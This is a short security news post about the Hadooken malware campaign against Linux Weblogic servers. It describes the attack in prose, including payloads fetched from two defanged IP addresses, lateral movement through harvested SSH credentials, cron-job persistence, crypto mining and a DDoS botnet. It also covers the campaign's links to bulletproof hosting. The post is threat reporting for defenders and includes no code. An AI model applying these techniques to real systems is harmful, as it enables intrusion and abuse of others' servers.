• Posted by: Michael Johnson
• September 13, 2024

New Hadooken Malware Targets Linux Servers for Cryptomining and Botnet

Cybersecurity researchers have identified a new malware campaign targeting Linux environments, specifically exploiting Oracle Weblogic servers to conduct illicit cryptocurrency mining and deliver botnet malware. The malware, dubbed Hadooken, was uncovered by cloud security firm Aqua.

According to security researcher Assaf Moran, "When Hadooken is executed, it drops a Tsunami malware and deploys a crypto miner." The Tsunami botnet (also known as Kaiten) has a history of targeting Jenkins and Weblogic services in Kubernetes clusters.

The attack takes advantage of known security vulnerabilities and misconfigurations, including weak credentials, to gain an initial foothold and execute arbitrary code on compromised systems. The attackers utilize two nearly identical payloads, one written in Python and the other in a shell script, to download Hadooken from remote servers at IP addresses 89.185.85[.]102 and 185.174.136[.]204.

The shell script further escalates the attack by iterating over directories containing SSH data (user credentials, host information, secrets) and using this data to attack known servers. This enables the malware to move laterally across the organization or connected environments, thereby spreading further.

Hadooken is designed with two core functionalities:

1. Cryptocurrency Mining – The malware establishes persistence on the infected host by creating cron jobs to run the miner at varying intervals.
2. Distributed Denial-of-Service (DDoS) Botnet – Hadooken deploys Tsunami, a botnet that can execute DDoS attacks.

Aqua's research also noted that the IP address 89.185.85[.]102 is registered to Aeza International LTD (AS210644) in Germany, which was previously associated with the 8220 Gang's cryptocurrency mining campaign. The gang exploited security flaws in Apache Log4j and Atlassian Confluence Server earlier in 2024. The second IP, 185.174.136[.]204, also linked to Aeza Group Ltd., is currently inactive but was identified as part of a bulletproof hosting service provider tied to Russian cybercrime networks.

Bulletproof hosting services, like Aeza, have become notorious for offering protection to cybercriminals by ignoring abuse reports, providing a safe haven for malware operations. A report by Qurium and EU DisinfoLab in July 2024 revealed Aeza's ties to Moscow-based servers and data centers in Frankfurt, enabling fast growth by recruiting young developers affiliated with the Russian cybercrime community.